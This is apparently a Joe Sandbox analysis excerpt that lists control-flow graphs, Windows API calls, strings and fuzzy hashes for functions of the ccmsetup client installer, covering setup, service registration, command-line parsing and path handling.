                                                                                          control_flow_graph 1265 59daad-59dae8 call 5d22f4 call 6743a3 call 5fc559 1272 59daea call 5b25a8 1265->1272 1273 59daef-59db01 call 5967fc 1265->1273 1272->1273 1277 59db03-59db0d call 5f0b53 1273->1277 1278 59db55-59db59 1273->1278 1285 59db0f-59db30 GetCurrentThreadId 1277->1285 1286 59db3e-59db45 1277->1286 1279 59db5f-59db63 1278->1279 1280 59df7e-59df80 1278->1280 1279->1280 1282 59db69-59db70 call 5f0b53 1279->1282 1287 59dfa3-59dfaa 1280->1287 1294 59db72-59db7b call 5f3b94 1282->1294 1295 59dba6-59dbae 1282->1295 1289 59db35-59db3b call 5f1811 1285->1289 1290 59db4c-59db50 1286->1290 1291 59db47 call 5f0dba 1286->1291 1292 59dfac-59dfb3 1287->1292 1293 59dfcf-59dfdd call 57e422 1287->1293 1289->1286 1290->1287 1291->1290 1292->1293 1299 59dfb5-59dfb9 1292->1299 1309 59e01a-59e028 1293->1309 1310 59dfdf-59dfe3 1293->1310 1294->1295 1317 59db7d-59dba3 call 592624 1294->1317 1304 59debf-59ded0 call 59c1cc 1295->1304 1305 59dbb4-59dbb6 1295->1305 1299->1293 1300 59dfbb-59dfc8 call 590cb7 1299->1300 1300->1293 1323 59dfca call 5cc119 1300->1323 1325 59df2f-59df3d call 59bbe4 1304->1325 1326 59ded2-59ded9 1304->1326 1311 59dda8-59ddbb call 59892f 1305->1311 1312 59dbbc-59dbbe 1305->1312 1314 59e02a 1309->1314 1315 59e02c-59e03a call 5f52af 1309->1315 1310->1309 1318 59dfe5-59dff3 call 57e8e8 1310->1318 1339 59ddf8-59de06 call 5813d1 1311->1339 1340 59ddbd-59ddc7 call 5f0b53 1311->1340 1312->1286 1320 59dbc4-59dbca 1312->1320 1314->1315 1345 59e03c-59e03e call 57e806 1315->1345 1346 59e043-59e045 1315->1346 1317->1295 1348 59e015 call 61b6b4 1318->1348 1349 59dff5-59dffc 1318->1349 1321 59dbdb-59dbee call 59892f 1320->1321 1322 59dbcc-59dbd5 call 58768c 1320->1322 1353 59dc2b-59dc35 call 5cf98c 1321->1353 1354 59dbf0-59dbfa call 5f0b53 1321->1354 1322->1280 1322->1321 1323->1293 1325->1286 1355 59df43-59df4d call 5f0b53 1325->1355 1335 59dedb-59dee2 1326->1335 1336 59dee4-59def2 call 5813d1 1326->1336 1335->1325 1335->1336 1336->1325 1370 59def4-59defe call 5f0b53 1336->1370 1363 59de08-59de12 call 5f0b53 1339->1363 1364 59de43-59de62 call 5baefa call 59892f 1339->1364 1340->1286 1372 59ddcd-59ddee GetCurrentThreadId 1340->1372 1345->1346 1357 59e04b-59e054 1346->1357 1358 59e0d3-59e0da call 5d2246 1346->1358 1348->1309 1349->1348 1360 59dffe-59e00b call 590cd0 1349->1360 1389 59dc40-59dc43 1353->1389 1390 59dc37-59dc3e 1353->1390 1354->1286 1386 59dc00-59dc26 GetCurrentThreadId 1354->1386 1355->1286 1387 59df53-59df74 GetCurrentThreadId 1355->1387 1368 59e05e-59e05f 1357->1368 1369 59e056-59e05c 1357->1369 1360->1348 1384 59e00d-59e010 call 592671 1360->1384 1363->1286 1394 59de18-59de39 GetCurrentThreadId 1363->1394 1404 59de9f-59deac 1364->1404 1405 59de64-59de6e call 5f0b53 1364->1405 1379 59e064 call 59c1cc 1368->1379 1369->1379 1370->1286 1392 59df04-59df25 GetCurrentThreadId 1370->1392 1372->1339 1391 59e069-59e06c 1379->1391 1384->1348 1386->1289 1387->1280 1396 59dc46-59dc98 call 5f415f call 5b04e2 call 59ef10 1389->1396 1390->1396 1398 59e06e-59e070 call 57e8e8 1391->1398 1399 59e075-59e07e call 59cd19 1391->1399 1392->1325 1394->1364 1422 59dc9a-59dca4 call 5f0b53 1396->1422 1423 59dcd5-59dce3 call 57e6bd 1396->1423 1398->1399 1399->1358 1412 59e080-59e092 1399->1412 1404->1286 1407 59deb2-59deba call 592671 1404->1407 1405->1286 1414 59de74-59de95 GetCurrentThreadId 1405->1414 1407->1286 1417 59e09c-59e0a5 call 5f3b94 1412->1417 1418 59e094-59e09a call 5c627f 1412->1418 1414->1404 1417->1358 1428 59e0a7-59e0d0 call 592624 1417->1428 1418->1358 1422->1286 1433 59dcaa-59dccb GetCurrentThreadId 1422->1433 1434 59dd20-59dda3 call 5ce714 call 59e344 call 5bb0da call 59834e call 599bed call 61bb65 call 61ba1a call 5c86dd call 5c86ad call 5776cf 1423->1434 1435 59dce5-59dcef call 5f0b53 1423->1435 1428->1358 1433->1423 1434->1286 1435->1286 1440 59dcf5-59dd16 GetCurrentThreadId 1435->1440 1440->1434
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0059DAB4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DB24
                                                                                            • Part of subcall function 005B25A8: __EH_prolog3_catch_GS.LIBCMT ref: 005B25B2
                                                                                            • Part of subcall function 005B25A8: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00020000,Root), ref: 005B261E
                                                                                            • Part of subcall function 005B25A8: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000090,0059DAEF,CcmSetup::WinMain,00000048), ref: 005B262F
                                                                                            • Part of subcall function 005B25A8: GetCurrentThreadId.KERNEL32 ref: 005B2664
                                                                                            • Part of subcall function 005B25A8: CertFreeCertificateContext.CRYPT32(00000000,00000000), ref: 005B28F1
                                                                                            • Part of subcall function 005B25A8: CertCloseStore.CRYPT32(?,00000000), ref: 005B2900
                                                                                            • Part of subcall function 005B25A8: CoTaskMemFree.OLE32(00000000,00000000), ref: 005B290F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DC15
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DCBF
                                                                                            • Part of subcall function 0057E6BD: __EH_prolog3_catch_GS.LIBCMT ref: 0057E6C4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DD0A
                                                                                            • Part of subcall function 0059892F: __EH_prolog3_catch_GS.LIBCMT ref: 00598939
                                                                                            • Part of subcall function 0059892F: OpenSCManagerW.ADVAPI32(00000000,00000000,10000000,CcmSetup::RegisterService,00000130,0058EBD4,?,?,00000001), ref: 0059898F
                                                                                            • Part of subcall function 0059892F: GetLastError.KERNEL32(?,?,00000001), ref: 005989AB
                                                                                            • Part of subcall function 0059892F: GetCurrentThreadId.KERNEL32 ref: 005989E3
                                                                                            • Part of subcall function 0059892F: CloseServiceHandle.ADVAPI32(?), ref: 005994DF
                                                                                            • Part of subcall function 0059892F: CloseServiceHandle.ADVAPI32(?), ref: 005994F5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DDE2
                                                                                            • Part of subcall function 005BAEFA: __EH_prolog3_catch_GS.LIBCMT ref: 005BAF01
                                                                                            • Part of subcall function 005BAEFA: GetCurrentThreadId.KERNEL32 ref: 005BAF80
                                                                                            • Part of subcall function 0059892F: GetCurrentThreadId.KERNEL32 ref: 00598B83
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DE2D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DE89
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DF19
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DF68
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$CertClose$ErrorFreeHandleLastOpenServiceStore$CertificateContextManagerTask
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$.log$About to take action %d$CcmSetup::WinMain$DeleteManifest()$DownloadCcmsetup()$DownloadCcmsetup()$PrepareForRun(bContinue)$Reached %d max failure retry count.$RegisterService(false, true)$RegisterService(false, true)$RegisterService(true, m_bAutoStartService)$RunStandalone()$UninstallRelatedProducts( c_szClientUpgradeCode, m_sMsiUninstallLogFile.length() > 0 ? m_sMsiUninstallLogFile : m_sMsiLogFile, (m_$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp${252DA259-82CA-4177-B8D0-49C78937BA3E}
                                                                                          • API String ID: 4282791920-3063312842
                                                                                          • Opcode ID: 9173a4bb8af6985f5f9b3bff220061dad03c1018ae6fafdb33092161088ffde8
                                                                                          • Instruction ID: 1c4778d4b2143f00bbe3c7adde82aa7351e5e1e4c214316766f106b2a8411130
                                                                                          • Opcode Fuzzy Hash: 9173a4bb8af6985f5f9b3bff220061dad03c1018ae6fafdb33092161088ffde8
                                                                                          • Instruction Fuzzy Hash: E2E10470A40756BADF11FBA0CD4ABBDBEB6BF52704F090145F9016B2C2CBA45D05DB62
                                                                                          Function 0058B6AD Relevance: 88.1, APIs: 14, Strings: 36, Instructions: 641threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1459 58b6ad-58b765 call 5d22f4 call 5f419f * 2 call 6743a3 GetCommandLineW CommandLineToArgvW 1468 58b7d2-58b7da call 5f3b94 1459->1468 1469 58b767-58b788 GetLastError call 5f0b53 1459->1469 1474 58b7dc-58b808 call 592624 1468->1474 1475 58b810-58b82a call 5f511f 1468->1475 1476 58b7b8-58b7c3 1469->1476 1477 58b78a-58b7b5 GetCurrentThreadId call 5f1811 1469->1477 1484 58b80d 1474->1484 1488 58b92c-58b990 call 5f419f * 2 call 5f415f call 5ba3b9 call 59ef10 call 5f52af 1475->1488 1489 58b830-58b833 1475->1489 1481 58b7ca-58b7cd 1476->1481 1482 58b7c5 call 5f0dba 1476->1482 1477->1476 1483 58c006-58c02c call 59ef10 * 2 call 5d2246 1481->1483 1482->1481 1484->1475 1554 58ba31-58ba40 call 5f52af 1488->1554 1555 58b996-58b9a1 call 5b64db 1488->1555 1489->1488 1492 58b839-58b83c 1489->1492 1492->1488 1495 58b842-58b844 1492->1495 1499 58b84a-58b855 call 5b76e6 1495->1499 1500 58b925-58b927 1495->1500 1510 58b85b-58b85f 1499->1510 1511 58b912-58b91b call 586ac2 1499->1511 1502 58bd2e-58bd32 1500->1502 1506 58bd38-58bd3a 1502->1506 1507 58bed9-58bee1 call 5f3b94 1502->1507 1513 58bd40-58bd6f call 5f415f call 5a234d 1506->1513 1514 58bf53-58bf5b 1506->1514 1529 58bf11-58bf4e LocalFree CommandLineToArgvW call 5f511f 1507->1529 1530 58bee3-58bf0e call 592624 1507->1530 1510->1511 1516 58b865-58b8b7 call 5f415f * 2 call 5f41ca * 2 1510->1516 1526 58b920 1511->1526 1547 58be50-58be66 call 59ef10 1513->1547 1548 58bd75-58bd82 call 5f0b53 1513->1548 1517 58bf5d-58bf7e GetLastError call 5f0b53 1514->1517 1518 58bfaf-58bfc8 1514->1518 1574 58b8b9 1516->1574 1575 58b8bb-58b90d call 5f511f call 59ef10 * 3 1516->1575 1517->1476 1542 58bf84-58bfa5 GetCurrentThreadId 1517->1542 1527 58bfca call 5f0dba 1518->1527 1528 58bfcf-58bfd2 1518->1528 1535 58bd28 1526->1535 1527->1528 1528->1483 1529->1514 1530->1529 1535->1502 1542->1518 1547->1507 1563 58be68-58be70 1547->1563 1558 58bdb3-58bdbb 1548->1558 1559 58bd84-58bdb0 GetCurrentThreadId call 5f1811 1548->1559 1570 58bdc3-58bdd2 call 5f52af 1554->1570 1571 58ba46-58ba59 call 5b64db 1554->1571 1572 58b9df-58b9f8 1555->1572 1573 58b9a3-58b9ac call 5f3b94 1555->1573 1558->1570 1559->1558 1563->1514 1568 58be76-58be7e call 5f3b94 1563->1568 1589 58be80-58bea0 call 592624 1568->1589 1590 58bea1-58bea9 call 5f3b94 1568->1590 1596 58bdd8-58bde5 call 5a19c8 1570->1596 1597 58bd04-58bd1e call 59ef10 1570->1597 1594 58ba5b-58ba68 call 5f0b53 1571->1594 1595 58bad7-58bae0 1571->1595 1582 58b9fa 1572->1582 1583 58b9fc-58ba2c call 5f567f 1572->1583 1573->1572 1598 58b9ae-58b9de call 592624 1573->1598 1574->1575 1623 58bd21-58bd23 call 59ef10 1575->1623 1582->1583 1601 58bcfe-58bcff call 5f511f 1583->1601 1589->1590 1590->1514 1615 58beaf-58bed7 call 592624 1590->1615 1628 58ba99-58baab call 59ef10 1594->1628 1629 58ba6a-58ba96 GetCurrentThreadId call 5f1811 1594->1629 1604 58bbd8-58bbdb 1595->1604 1605 58bae6-58baf0 1595->1605 1630 58be25-58be47 call 59ef10 1596->1630 1631 58bde7-58be09 call 5b64db 1596->1631 1597->1623 1598->1572 1601->1597 1612 58bc0d-58bc28 call 5f52af 1604->1612 1613 58bbdd-58bbf6 1604->1613 1616 58baf1-58baf9 1605->1616 1647 58bc2e-58bc3d call 5f52af 1612->1647 1648 58bce7-58bcf8 1612->1648 1621 58bbf8 1613->1621 1622 58bbfa-58bc0a call 5f567f 1613->1622 1615->1514 1626 58baff-58bb16 call 5d1bbb 1616->1626 1627 58bba3-58bba5 1616->1627 1621->1622 1622->1612 1623->1535 1658 58bb18-58bb25 call 5a19aa 1626->1658 1659 58bb52-58bb78 call 5d1d29 1626->1659 1627->1604 1640 58bba7-58bbc0 1627->1640 1656 58baaf-58bac8 call 59ef10 1628->1656 1629->1628 1630->1547 1654 58be0b 1631->1654 1655 58be0d-58be20 call 5f567f 1631->1655 1650 58bbc2 1640->1650 1651 58bbc4-58bbd5 call 5f567f 1640->1651 1647->1648 1671 58bc43-58bc52 call 5f52af 1647->1671 1648->1601 1650->1651 1651->1604 1654->1655 1655->1597 1674 58baca call 5f0dba 1656->1674 1675 58bacf-58bffd 1656->1675 1672 58bb8b 1658->1672 1673 58bb27-58bb4d call 59ef10 1658->1673 1676 58bb7a-58bb89 1659->1676 1677 58bb91 1659->1677 1671->1648 1684 58bc58-58bc8c call 5f511f call 5f646b 1671->1684 1672->1677 1673->1656 1674->1675 1675->1483 1686 58bfff-58c000 LocalFree 1675->1686 1682 58bb97-58bb9e 1676->1682 1677->1682 1682->1616 1684->1597 1691 58bc8e-58bc9b call 5f0b53 1684->1691 1686->1483 1694 58bccc-58bcde call 59ef10 1691->1694 1695 58bc9d-58bcc9 GetCurrentThreadId call 5f1811 1691->1695 1694->1648 1695->1694
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058B6B7
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCommandLineW.KERNEL32(CcmSetup::GetSetupCommandLine), ref: 0058B741
                                                                                          • CommandLineToArgvW.SHELL32(00000000,?), ref: 0058B755
                                                                                          • GetLastError.KERNEL32 ref: 0058B767
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058B7A0
                                                                                            • Part of subcall function 00586AC2: __EH_prolog3_catch_GS.LIBCMT ref: 00586ACC
                                                                                            • Part of subcall function 00586AC2: GetCurrentThreadId.KERNEL32 ref: 00586BB2
                                                                                            • Part of subcall function 005A234D: __EH_prolog3_catch_GS.LIBCMT ref: 005A2357
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058BD99
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000001,00000000,00000001,00000000,/UpgradeWithServer:,/remediate:,/evaluate:,00000001,00000000,?,?,?,?,?), ref: 0058BF17
                                                                                          • CommandLineToArgvW.SHELL32(?,?), ref: 0058BF30
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          • GetLastError.KERNEL32(?), ref: 0058BF5D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058BF99
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CommandH_prolog3_catch_Line$ArgvErrorLast$FreeH_prolog3Local
                                                                                          • String ID: "%s" %s$"%s" %s %s$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$/OSUpgradeRepair$/UpgradeWithServer:$/evaluate:$/log:$/remediate:$CcmSetup::GetSetupCommandLine$Ccmsetup command line: %s$Command line parameters for ccmsetup have been specified. No registry lookup for command line parameters is required.$Command line: %s$Failed to get ccmsetup params from registry$GetCcmsetupParams(sParams)$Loaded command line: %s$all$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$client$g_pSetupEnv->ParseAutoUpgradeCommandLine(sCurrentCommandLine, sCommandLine)$prereqs$pszaArgs != 0$pszaArgs = CommandLineToArgvW(szCommandLine, &uNumArgs)$sValue.tokenize(c_szOption_Separator, m_arrRepairPreReqs)
                                                                                          • API String ID: 502516922-1079772330
                                                                                          • Opcode ID: 2ba8c072a49420fc8ea6662634a01df07b23fae1a3fbecef0dfcd0e4905d7b23
                                                                                          • Instruction ID: d1ac0b9ad55fa2383b2186d3cab0ae5ff4ca6b789d7bb3368262670c0bd969b4
                                                                                          • Opcode Fuzzy Hash: 2ba8c072a49420fc8ea6662634a01df07b23fae1a3fbecef0dfcd0e4905d7b23
                                                                                          • Instruction Fuzzy Hash: 3442AE71900249EEEB20EBA4CD49BEEBFB9BF56304F144099E545B7282DB745E48CF21
                                                                                          Function 00607BCA Relevance: 84.3, APIs: 15, Strings: 33, Instructions: 254threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1700 607bca-607c34 call 5d22f4 call 5f419f call 5d4610 call 6743a3 1709 607f30-607f42 call 5f0b53 1700->1709 1710 607c3a-607c3d 1700->1710 1719 607f70-607f7b 1709->1719 1720 607f44-607f62 GetCurrentThreadId 1709->1720 1710->1709 1711 607c43-607c4c PathIsRelativeW 1710->1711 1713 607c52-607c9f call 5d4610 * 2 GetCurrentDirectoryW 1711->1713 1714 607daf-607dbf PathCanonicalizeW 1711->1714 1740 607cf0-607d07 PathCombineW 1713->1740 1741 607ca1-607cc2 GetLastError call 5f0b53 1713->1741 1717 607dc1-607dd5 call 5f0b53 1714->1717 1718 607e06-607e23 call 6083e6 1714->1718 1717->1719 1734 607ddb-607e01 GetCurrentThreadId 1717->1734 1736 607e60-607e7c call 605d68 1718->1736 1737 607e25-607e32 call 5f0b53 1718->1737 1725 607f82-607f85 1719->1725 1726 607f7d call 5f0dba 1719->1726 1723 607f67-607f6d call 5f1811 1720->1723 1723->1719 1732 607fa7-607fb4 call 59ef10 1725->1732 1726->1725 1743 607fb9-607fc0 call 5d2246 1732->1743 1734->1723 1752 607ebe-607ed4 call 608558 1736->1752 1753 607e7e-607e90 call 5f0b53 1736->1753 1737->1719 1756 607e38-607e5b GetCurrentThreadId 1737->1756 1747 607d09-607d1d call 5f0b53 1740->1747 1748 607d4e-607d64 PathCanonicalizeW 1740->1748 1741->1719 1760 607cc8-607ceb GetCurrentThreadId 1741->1760 1747->1719 1765 607d23-607d49 GetCurrentThreadId 1747->1765 1748->1718 1750 607d6a-607d7e call 5f0b53 1748->1750 1750->1719 1766 607d84-607daa GetCurrentThreadId 1750->1766 1764 607ed9-607ee3 1752->1764 1753->1719 1767 607e96-607eb9 GetCurrentThreadId 1753->1767 1756->1723 1760->1723 1768 607ee5-607ef2 call 5f0b53 1764->1768 1769 607f19-607f24 1764->1769 1765->1723 1766->1723 1767->1723 1768->1719 1775 607ef4-607f17 GetCurrentThreadId 1768->1775 1771 607f26 call 5f0dba 1769->1771 1772 607f2b-607f2e 1769->1772 1771->1772 1772->1732 1775->1723
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00607BD4
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • PathIsRelativeW.SHLWAPI(?,CCM::Utility::Filesystem::Path::Create), ref: 00607C44
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00607C97
                                                                                          • GetLastError.KERNEL32 ref: 00607CA1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00607CDE
                                                                                          • PathCombineW.SHLWAPI(?,?,?), ref: 00607CFF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00607D38
                                                                                          • PathCanonicalizeW.SHLWAPI(?,?), ref: 00607DB7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00607DF0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00607F5A
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607D94
                                                                                          • ..\path.cpp, xrefs: 00607F62
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607F55
                                                                                          • !Directory::Exists(sNormalizedPath), xrefs: 00607EA2
                                                                                          • ..\path.cpp, xrefs: 00607D28
                                                                                          • ::GetCurrentDirectoryW((sizeof(szCurrentDirectory)/sizeof(szCurrentDirectory[0])), szCurrentDirectory), xrefs: 00607CD4
                                                                                          • ..\path.cpp, xrefs: 00607E56
                                                                                          • ..\path.cpp, xrefs: 00607DFC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607E49
                                                                                          • Path::Normalize( szFullPath, sNormalizedPath ), xrefs: 00607E44
                                                                                          • ..\path.cpp, xrefs: 00607DA5
                                                                                          • ..\path.cpp, xrefs: 00607CCE
                                                                                          • ..\path.cpp, xrefs: 00607E3E
                                                                                          • ..\path.cpp, xrefs: 00607E9C
                                                                                          • ..\path.cpp, xrefs: 00607EB4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607EA7
                                                                                          • ::PathCombineW(szCombinedPath, szCurrentDirectory, pszPath) != 0, xrefs: 00607D2E
                                                                                          • ..\path.cpp, xrefs: 00607EFA
                                                                                          • ..\path.cpp, xrefs: 00607D44
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607D33
                                                                                          • RecursiveCreatePath( sNormalizedPath, psa ), xrefs: 00607F00
                                                                                          • pszPath && pszPath[0], xrefs: 00607F50
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607CD9
                                                                                          • ::PathCanonicalizeW(szFullPath, pszPath), xrefs: 00607DE6
                                                                                          • ..\path.cpp, xrefs: 00607F12
                                                                                          • CCM::Utility::Filesystem::Path::Create, xrefs: 00607C11
                                                                                          • ..\path.cpp, xrefs: 00607CE6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607F05
                                                                                          • ::PathCanonicalizeW(szFullPath, szCombinedPath), xrefs: 00607D8F
                                                                                          • ..\path.cpp, xrefs: 00607F4A
                                                                                          • ..\path.cpp, xrefs: 00607DE0
                                                                                          • ..\path.cpp, xrefs: 00607D89
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607DEB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$Thread$Path$CanonicalizeCombineDirectoryErrorH_prolog3H_prolog3_catch_LastRelative
                                                                                          • String ID: !Directory::Exists(sNormalizedPath)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$::GetCurrentDirectoryW((sizeof(szCurrentDirectory)/sizeof(szCurrentDirectory[0])), szCurrentDirectory)$::PathCanonicalizeW(szFullPath, pszPath)$::PathCanonicalizeW(szFullPath, szCombinedPath)$::PathCombineW(szCombinedPath, szCurrentDirectory, pszPath) != 0$CCM::Utility::Filesystem::Path::Create$Path::Normalize( szFullPath, sNormalizedPath )$RecursiveCreatePath( sNormalizedPath, psa )$pszPath && pszPath[0]
                                                                                          • API String ID: 2248011117-4113748939
                                                                                          • Opcode ID: 78a3225fde75ba05a6344820e409d285d60036e527b77827876a6aaa19d7c8d1
                                                                                          • Instruction ID: 918fc0b022ae69a0ef4f575edcd5f58f4927e890ede74bed68ee30c7a6099e0d
                                                                                          • Opcode Fuzzy Hash: 78a3225fde75ba05a6344820e409d285d60036e527b77827876a6aaa19d7c8d1
                                                                                          • Instruction Fuzzy Hash: C091ECB1D84315AADB30DF608C09FDF7A7AAF95B05F044095F908B72C2DAB56E46CB60
                                                                                          Function 005C86ED Relevance: 77.4, APIs: 8, Strings: 36, Instructions: 417threadcomCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
